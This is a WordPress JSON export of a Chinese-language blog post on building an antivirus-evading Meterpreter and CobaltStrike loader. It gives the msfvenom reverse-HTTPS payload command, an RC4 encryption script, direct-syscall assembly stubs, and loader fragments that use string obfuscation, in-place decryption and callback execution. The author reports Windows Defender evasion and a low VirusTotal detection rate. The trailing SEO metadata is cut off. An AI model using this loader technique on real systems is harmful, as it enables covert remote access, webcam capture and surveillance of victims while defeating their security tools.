{"id":659,"date":"2026-02-01T17:23:21","date_gmt":"2026-02-01T09:23:21","guid":{"rendered":"https:\/\/chengyunpu.com\/wordpress\/?p=659"},"modified":"2026-02-05T07:31:41","modified_gmt":"2026-02-04T23:31:41","slug":"evading-antivirus-with-meterpreter-cobaltstrike-payload","status":"publish","type":"post","link":"https:\/\/chengyunpu.com\/wordpress\/2026\/02\/01\/evading-antivirus-with-meterpreter-cobaltstrike-payload\/","title":{"rendered":"Evading AntiVirus With Meterpreter &amp; CobaltStrike Payload"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\">0x00<\/h3>\n\n\n\n<p>OSCP \u8003\u5b8c + \u7279\u6b8a\u9078\u624d\u4e0a\u81fa\u7063\u5927\u5b78\u7cfb\u7d71\u7684\u5176\u4e2d\u5169\u9593\u5b78\u6821\u5f8c\uff0c\u7d42\u65bc\u6709\u6642\u9593\u597d\u597d\u7814\u7a76 defense evasion \u7684\u5340\u584a\u3002\u900f\u904e RC4 encryption, direct syscalls, and Windows callback functions for in-memory execution \u5be6\u4f5c shellcode loader\u3002\u6210\u529f\u5728 Windows Defender \u958b\u555f\u4e0b\u8dd1 Meterpreter session \u4e14\u53ef\u4ee5\u8dd1 screenshot\u3001webcam_snap \u7b49\u8f03\u654f\u611f\u64cd\u4f5c\uff0c\u5728 <a href=\"https:\/\/www.virustotal.com\/gui\/file\/a8cc11b75d78ae06cd28bb478e326a56e59a6e3f4398b826724481e42228754d\">VirusTotal<\/a> \u7684\u67e5\u6bba\u7387 10\/72 \u3002<\/p>\n\n\n\n<p>\u88dc\u5145\u4e00\u4e0b\uff0c\u5982\u679c\u662f\u7d14 raw \u5728 VT \u4e0a\u662f 52\/72\uff0c\u7d14 exe \u5728 VT \u4e0a\u662f 57\/71 \u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"471\" src=\"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image-1024x471.png\" alt=\"\" class=\"wp-image-669\" srcset=\"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image-1024x471.png 1024w, https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image-300x138.png 300w, https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image-768x354.png 768w, https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image-1536x707.png 1536w, https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image.png 1666w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u6211\u7684 C2 \u67b6\u5728\u8ddf victim \u540c\u7db2\u6bb5 (192.168.0.*\/24) \u7684 Ubuntu \u88e1\u9762\u7684 VM\uff0c\u5728 Ubuntu \u88e1\u9762\u7528 nginx reverse stream proxy \u5c07\u6d41\u91cf\u5c0e\u5230 C2 \u4e0a\uff0c\u6240\u4ee5\u5f71\u7247\u7684 IP \u53ef\u80fd\u4e0d\u662f\u90a3\u9ebc\u76f4\u89ba\u3002<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe loading=\"lazy\" title=\"Evading AntiVirus With Meterpreter Payload\" width=\"500\" height=\"281\" src=\"https:\/\/www.youtube.com\/embed\/yTm60QJeOXo?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>CobaltStrike Windows Stageless Payload&nbsp;\u4e5f\u884c\u7684\u54e6! \u53ea\u662f\u9700\u8981 .profile \u4e0d\u80fd\u76f4\u63a5\u7528\u9810\u8a2d\u7684\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1920\" height=\"1200\" src=\"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image-2.png\" alt=\"\" class=\"wp-image-691\" srcset=\"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image-2.png 1920w, https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image-2-300x188.png 300w, https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image-2-1024x640.png 1024w, https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image-2-768x480.png 768w, https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image-2-1536x960.png 1536w\" sizes=\"auto, (max-width: 1920px) 100vw, 1920px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">0x01 &#8211; Generate Payload<\/h3>\n\n\n\n<p>\u751f\u4e00\u500b raw format \u7684 Windows x64 stageless meterpreter payload\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/tools\/AV_evasion]\n\u2514\u2500$ msfvenom -p windows\/x64\/meterpreter_reverse_https LHOST=192.168.0.144 LPORT=4444 -f raw -o payload.bin\n[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload\n[-] No arch selected, selecting arch: x64 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 204892 bytes\nSaved as: payload.bin<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">0x02 &#8211; RC4 Encrypt Payload<\/h3>\n\n\n\n<p>\u4f7f\u7528\u4ee5\u4e0b RC4 script\uff0c\u52a0\u5bc6 payload.bin\uff0c\u907f\u514d signature \u88ab\u6293\u5230\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"python\" class=\"language-python\"># rc4_encrypt.py\ndef rc4_encrypt(data, key):\n    # Key-scheduling algorithm (KSA)\n    S = list(range(256))\n    j = 0\n    for i in range(256):\n        j = (j + S[i] + key[i % len(key)]) % 256\n        S[i], S[j] = S[j], S[i]\n    \n    # Pseudo-random generation algorithm (PRGA)\n    i = j = 0\n    ciphertext = bytearray()\n    for byte in data:\n        i = (i + 1) % 256\n        j = (j + S[i]) % 256\n        S[i], S[j] = S[j], S[i]\n        k = S[(S[i] + S[j]) % 256]\n        ciphertext.append(byte ^ k)\n    return ciphertext\n\nwith open('payload.bin', 'rb') as f:\n    shellcode = f.read()\n\nkey = b\"YOUR_SECRET_KEY\"  \n\nencrypted = rc4_encrypt(shellcode, key)\n\nwith open('encrypted_payload.h', 'w') as f:\n    f.write(\", \".join(f\"0x{b:02x}\" for b in encrypted))\n\n\nwith open('rc4_key.h','w') as f:\n    f.write(\",\".join(f\"0x{b:02x}\" for b in key))\n\nGREEN = \"\\033[92m\"\nBLUE = \"\\033[94m\"\nRESET = \"\\033[0m\"\nINFO = f\"{BLUE}[*]{RESET}\"\nSUCCESS = f\"{GREEN}[+]{RESET}\"\n\nprint(f\"{SUCCESS} Payload encryption complete. File saved: {BLUE}encrypted_payload.h{RESET}\")\nprint(f\"{SUCCESS} RC4 key exported. File saved: {BLUE}rc4_key.h{RESET}\")<\/code><\/pre>\n\n\n\n<p>\u57f7\u884c py script \u7522\u51fa loader.cpp \u6703\u7528\u5230\u7684 encrypted_payload.h &amp; rc4_key.h\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/tools\/AV_evasion]\n\u2514\u2500$ python3 rc4_encrypt.py\n[+] Payload encryption complete. File saved: encrypted_payload.h\n[+] RC4 key exported. File saved: rc4_key.h<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">0x03 &#8211; Direct Syscalls (NTAPI)<\/h3>\n\n\n\n<p>\u70ba\u4e86\u76e1\u53ef\u80fd\u7684\u907f\u514d antivirus \uff0c\u8207\u5176\u5728 user mode \u547c\u53eb\u53ef\u80fd\u906d\u53d7 hook \u7684 API\uff0c\u4e0d\u5982\u76f4\u63a5\u900f\u904e syscall \u9032\u5165 kernel mode\uff0c\u4f46\u6700\u6838\u5fc3\u7684\u554f\u984c\u5728\u65bc\uff1a<strong>System Service Number<\/strong> \u6703\u96a8\u8457 Windows \u7248\u672c\u66f4\u8fed\u800c\u6539\u8b8a\u3002\u78ba\u4fddLoader \u80fd\u904b\u4f5c\uff0c\u4e8b\u5148\u5728 <a href=\"https:\/\/hfiref0x.github.io\/sctables\/X86_64\/NT10_syscalls.html\" target=\"_blank\" rel=\"noreferrer noopener\">NT OS System Service Table<\/a> \u78ba\u8a8d\u4e86\u4e94\u500b syscall\u3002<\/p>\n\n\n\n<p>\u767c\u73fe\u5728 <strong>Windows <\/strong>10061 \u5230 28020 \u4e4b\u9593\uff0c\u9019\u5e7e\u500b\u95dc\u9375 API \u7684 SSN \u90fd\u662f\u4e00\u6a23\u7684\uff0c\u66ab\u6642\u4e0d\u6703\u6709\u7248\u672c\u4e0d\u7b26\u7684\u554f\u984c\u3002<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><thead><tr><td><strong>Function Name<\/strong><\/td><td><strong>SSN (Win 10\/11)<\/strong><\/td><td><strong>Purpose<\/strong><\/td><\/tr><\/thead><tbody><tr><td><strong>NtCreateSection<\/strong><\/td><td>0x4A<\/td><td>Creates a section object in memory.<\/td><\/tr><tr><td><strong>NtMapViewOfSection<\/strong><\/td><td>0x28<\/td><td>Maps a view of a section into the virtual address space of a process.<\/td><\/tr><tr><td><strong>NtProtectVirtualMemory<\/strong><\/td><td>0x50<\/td><td>Changes the protection on a region of committed pages .<\/td><\/tr><tr><td><strong>NtUnmapViewOfSection<\/strong><\/td><td>0x2A<\/td><td>Unmaps a view of a section from the virtual address space.<\/td><\/tr><tr><td><strong>NtClose<\/strong><\/td><td>0x0F<\/td><td>Closes an open object handle.<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"c\" class=\"language-c\">BITS 64\nDEFAULT REL\n\nsection .text\nglobal x_001\nglobal x_002\nglobal x_003\nglobal x_004\nglobal x_005\n\n; NtCreateSection\nx_001:\n    mov r10, rcx\n    mov eax, 0x4A\n    syscall\n    ret\n\n; NtMapViewOfSection\nx_002:\n    mov r10, rcx\n    mov eax, 0x28\n    syscall\n    ret\n\n; NtProtectVirtualMemory\nx_003:\n    mov r10, rcx\n    mov eax, 0x50\n    syscall\n    ret\n\n; NtUnmapViewOfSection\nx_004:\n    mov r10, rcx\n    mov eax, 0x2A\n    syscall\n    ret\n\n; NtClose\nx_005:\n    mov r10, rcx\n    mov eax, 0x0F\n    syscall\n    ret<\/code><\/pre>\n\n\n\n<p>assemble object file<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/tools\/AV_evasion]\n\u2514\u2500$ nasm -f win64 syscalls.asm -o syscalls.o<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">0x04 &#8211; Loader \u5be6\u4f5c\u539f\u7406<\/h3>\n\n\n\n<p>\u9452\u65bc loader \u5be6\u4f5c\u4e0d\u6613\u5c31\u4e0d\u516c\u958b\u5b8c\u6574\u4e86 loader\uff0c\u50c5\u5206\u4eab\u4e9b\u5be6\u4f5c\u6703\u7528\u5230\u7684 key point \u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">1. \u5b57\u4e32\u62fc\u63a5\u6df7\u6dc6<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"cpp\" class=\"language-cpp\">string s1 = \"a\"; ... string _lib  = s1+s2+s3+s4+s5+s6+s7;   \/\/ \u2192 \"advapi32.dll\"\nstring k1 = \"Sys\"; ... string _proc = k1+k2+k3+k4+k5;       \/\/ \u2192 \"SystemFunction032\"<\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u907f\u514d\u76f4\u63a5\u51fa\u73fe <code>\"advapi32.dll\"<\/code> \u548c <code>\"SystemFunction032\"<\/code> \u9019\u5169\u500b\u660e\u986f\u7684\u5b57\u4e32<\/li>\n<\/ul>\n\n\n\n<h4 class=\"wp-block-heading\">2. \u52d5\u614b\u8f09\u5165 SystemFunction032<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"cpp\" class=\"language-cpp\">HMODULE m = GetModuleHandleA(_lib.c_str());\nif (!m) m = LoadLibraryA(_lib.c_str());\n_T x = (_T)GetProcAddress(m, _proc.c_str());<\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>SystemFunction032<\/code> \u662f advapi32.dll \u532f\u51fa\u7684 RC4 \u52a0\u5bc6\/\u89e3\u5bc6\u51fd\u6578<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"cpp\" class=\"language-cpp\">  NTSTATUS SystemFunction032(PRC4_CONTEXT pContext, PBYTE pKey);<\/code><\/pre>\n\n\n\n<p>\u5176\u4e2d <code>pContext<\/code> \u5176\u5be6\u5c31\u662f\u770b\u5230\u7684 <code>_K<\/code> \u7d50\u69cb<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">3. payload \u8207 key \u90fd\u662f #include \u9032\u4f86\u7684 array<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"cpp\" class=\"language-cpp\">unsigned char s[] = { #include \"encrypted_payload.h\" };\nunsigned char t[] = { #include \"rc4_key.h\" };<\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u7de8\u8b6f\u6642\u628a\u52a0\u5bc6\u904e\u7684 shellcode \u548c key \u76f4\u63a5 copy \u9032 binary<\/li>\n<\/ul>\n\n\n\n<h4 class=\"wp-block-heading\">4. \u4f7f\u7528 Section \u7269\u4ef6\u4f86\u5206\u914d\u53ef\u57f7\u884c\u8a18\u61b6\u9ad4<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"cpp\" class=\"language-cpp\">x_001(&amp;g, 0xF001F, NULL, &amp;q, 0x40, 0x08000000, NULL);     \/\/ NtCreateSection\nx_002(g, (HANDLE)-1, &amp;y, 0, 0, NULL, &amp;w, 1, 0, 0x40);     \/\/ NtMapViewOfSection<\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>x_001<\/code> \u2192 NtCreateSection<\/li>\n\n\n\n<li><code>x_002<\/code> \u2192 NtMapViewOfSection<\/li>\n\n\n\n<li>\u6b0a\u9650\uff1a0x40 = PAGE_EXECUTE_READWRITE<\/li>\n<\/ul>\n\n\n\n<h4 class=\"wp-block-heading\">5. \u5beb\u5165\u52a0\u5bc6 shellcode \u2192 RC4 \u89e3\u5bc6 \u2192 \u6539\u4fdd\u8b77 \u2192 \u57f7\u884c<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"cpp\" class=\"language-cpp\">memcpy(y, s, z);               \/\/ \u628a\u52a0\u5bc6\u7684 shellcode \u5148\u8907\u88fd\u9032\u53bb\n_K o = { (DWORD)z, (DWORD)z, (PUCHAR)y };\n_K p = { (DWORD)sizeof(t), ..., (PUCHAR)t };\nx(&amp;o, &amp;p);                     \/\/ SystemFunction032 \u2192 RC4 \u89e3\u5bc6\uff08\u5c31\u5730\u89e3\u5bc6\uff09\nx_003(..., 0x20, ...);         \/\/ NtProtectVirtualMemory \u2192 PAGE_EXECUTE_READ (0x20)\nEnumCalendarInfoA((CALINFO_ENUMPROCA)y, 2048, 1, 2);   \/\/ \u2190 \u57f7\u884c shellcode<\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u89e3\u5bc6\u5728\u539f\u5730\u9032\u884c \u2192 \u8a18\u61b6\u9ad4\u4e2d\u5f9e\u4f86\u6c92\u6709\u300c\u660e\u6587 shellcode \u7576\u53c3\u6578\u50b3\u9032\u53bb\u300d\u7684\u75d5\u8de1<\/li>\n\n\n\n<li>0x20 \u2192 PAGE_EXECUTE_READ\uff0c\u6700\u6a19\u6e96\u7684\u7a0b\u5f0f\u78bc\u5340\u6bb5\u6b0a\u9650<\/li>\n\n\n\n<li><strong>EnumCalendarInfoA<\/strong> \u662f\u6574\u500b loader \u6700\u95dc\u9375\u7684\u96b1\u853d\u57f7\u884c\u9ede\uff1a<br>\u9019\u662f\u4e00\u500b callback \u578b API\uff0c\u9810\u671f\u4f60\u50b3\u4e00\u500b CALINFO_ENUMPROCA \u51fd\u6578\u6307\u6a19<br>\u76f4\u63a5\u628a shellcode \u4f4d\u5740\u5f37\u8f49\u6210 callback \u2192 Windows \u6703\u300c\u6b63\u5e38\u300d\u547c\u53eb\u5b83<\/li>\n<\/ul>\n\n\n\n<h4 class=\"wp-block-heading\">6. \u6700\u5f8c\u6e05\u7406\u73fe\u5834<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"cpp\" class=\"language-cpp\">x_004((HANDLE)-1, y);   \/\/ NtUnmapViewOfSection\nx_005(g);               \/\/ NtClose (section handle)<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><thead><tr><th>\u5c64\u9762<\/th><th>\u6280\u8853\u9078\u64c7<\/th><th>\u4e3b\u8981\u7e5e\u904e\u76ee\u6a19<\/th><\/tr><\/thead><tbody><tr><td>\u5b57\u4e32<\/td><td>\u62fc\u63a5\u6df7\u6dc6<\/td><td>\u975c\u614b\u6383\u63cf\u3001YARA<\/td><\/tr><tr><td>\u52a0\u5bc6<\/td><td>RC4 + SystemFunction032<\/td><td>\u975c\u614b\u7279\u5fb5\u3001\u660e\u6587 shellcode<\/td><\/tr><tr><td>\u8a18\u61b6\u9ad4\u5206\u914d<\/td><td>NtCreateSection + NtMapViewOfSection<\/td><td>\u907f VirtualAlloc \u76e3\u63a7<\/td><\/tr><tr><td>\u5beb\u5165<\/td><td>memcpy \u5230 section view<\/td><td>\u907f WriteProcessMemory<\/td><\/tr><tr><td>\u89e3\u5bc6<\/td><td>\u539f\u5730 RC4 \u89e3\u5bc6<\/td><td>\u907f\u660e\u6587 shellcode \u51fa\u73fe\u5728\u5806\u758a\/\u53c3\u6578<\/td><\/tr><tr><td>\u57f7\u884c<\/td><td>EnumCalendarInfoA callback<\/td><td>\u907f CreateRemoteThread \/ \u65b0\u57f7\u884c\u7dd2<\/td><\/tr><tr><td>API \u5c64\u7d1a<\/td><td>\u5168\u7a0b\u504f\u597d Native API (Nt*)<\/td><td>\u907f user-mode hook<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>\u6700\u7d42\u5728\u7de8\u8b6f\u5b8c\u5c31\u6709\u4e00\u500b\u904e defender \u7684 meterpreter Trojan<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/tools\/AV_evasion]\n\u2514\u2500$ x86_64-w64-mingw32-g++ loader_syscall.cpp syscalls.o -o exp.exe<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"614\" src=\"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image-1-1024x614.png\" alt=\"\" class=\"wp-image-686\" srcset=\"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image-1-1024x614.png 1024w, https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image-1-300x180.png 300w, https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image-1-768x461.png 768w, https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image-1-1536x922.png 1536w, https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image-1.png 1920w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>0x00 OSCP \u8003\u5b8c + \u7279\u6b8a\u9078\u624d\u4e0a [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[1],"tags":[],"class_list":["post-659","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.8 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Evading AntiVirus With Meterpreter &amp; CobaltStrike Payload - my article<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/chengyunpu.com\/wordpress\/2026\/02\/01\/evading-antivirus-with-meterpreter-cobaltstrike-payload\/\" \/>\n<meta property=\"og:locale\" content=\"zh_TW\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Evading AntiVirus With Meterpreter &amp; CobaltStrike Payload - my article\" \/>\n<meta property=\"og:description\" content=\"0x00 OSCP \u8003\u5b8c + \u7279\u6b8a\u9078\u624d\u4e0a [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/chengyunpu.com\/wordpress\/2026\/02\/01\/evading-antivirus-with-meterpreter-cobaltstrike-payload\/\" \/>\n<meta property=\"og:site_name\" content=\"my article\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-01T09:23:21+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-02-04T23:31:41+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image-1024x471.png\" \/>\n<meta name=\"author\" content=\"chengyunpu\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u4f5c\u8005:\" \/>\n\t<meta name=\"twitter:data1\" content=\"chengyunpu\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u9810\u4f30\u95b1\u8b80\u6642\u9593\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 \u5206\u9418\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/2026\/02\/01\/evading-antivirus-with-meterpreter-cobaltstrike-payload\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/2026\/02\/01\/evading-antivirus-with-meterpreter-cobaltstrike-payload\/\"},\"author\":{\"name\":\"chengyunpu\",\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/#\/schema\/person\/f697887c7eea19b57c04d0a2bb4d9411\"},\"headline\":\"Evading AntiVirus With Meterpreter &amp; CobaltStrike Payload\",\"datePublished\":\"2026-02-01T09:23:21+00:00\",\"dateModified\":\"2026-02-04T23:31:41+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/2026\/02\/01\/evading-antivirus-with-meterpreter-cobaltstrike-payload\/\"},\"wordCount\":250,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/#\/schema\/person\/f697887c7eea19b57c04d0a2bb4d9411\"},\"image\":{\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/2026\/02\/01\/evading-antivirus-with-meterpreter-cobaltstrike-payload\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image-1024x471.png\",\"inLanguage\":\"zh-TW\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/chengyunpu.com\/wordpress\/2026\/02\/01\/evading-antivirus-with-meterpreter-cobaltstrike-payload\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/2026\/02\/01\/evading-antivirus-with-meterpreter-cobaltstrike-payload\/\",\"url\":\"https:\/\/chengyunpu.com\/wordpress\/2026\/02\/01\/evading-antivirus-with-meterpreter-cobaltstrike-payload\/\",\"name\":\"Evading AntiVirus With Meterpreter &amp; CobaltStrike Payload - my article\",\"isPartOf\":{\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/2026\/02\/01\/evading-antivirus-with-meterpreter-cobaltstrike-payload\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/2026\/02\/01\/evading-antivirus-with-meterpreter-cobaltstrike-payload\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image-1024x471.png\",\"datePublished\":\"2026-02-01T09:23:21+00:00\",\"dateModified\":\"2026-02-04T23:31:41+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/2026\/02\/01\/evading-antivirus-with-meterpreter-cobaltstrike-payload\/#breadcrumb\"},\"inLanguage\":\"zh-TW\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/chengyunpu.com\/wordpress\/2026\/02\/01\/evading-antivirus-with-meterpreter-cobaltstrike-payload\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-TW\",\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/2026\/02\/01\/evading-antivirus-with-meterpreter-cobaltstrike-payload\/#primaryimage\",\"url\":\"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image.png\",\"contentUrl\":\"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image.png\",\"width\":1666,\"height\":767},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/2026\/02\/01\/evading-antivirus-with-meterpreter-cobaltstrike-payload\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\u9996\u9801\",\"item\":\"https:\/\/chengyunpu.com\/wordpress\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Evading AntiVirus With Meterpreter &amp; CobaltStrike Payload\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/#website\",\"url\":\"https:\/\/chengyunpu.com\/wordpress\/\",\"name\":\"my article\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/#\/schema\/person\/f697887c7eea19b57c04d0a2bb4d9411\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/chengyunpu.com\/wordpress\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"zh-TW\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/#\/schema\/person\/f697887c7eea19b57c04d0a2bb4d9411\",\"name\":\"chengyunpu\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-TW\",\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/8e26f1a47b73420e32e35b25e19c6abf045eb208b1a34d5d90f5d166505983d2?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/8e26f1a47b73420e32e35b25e19c6abf045eb208b1a34d5d90f5d166505983d2?s=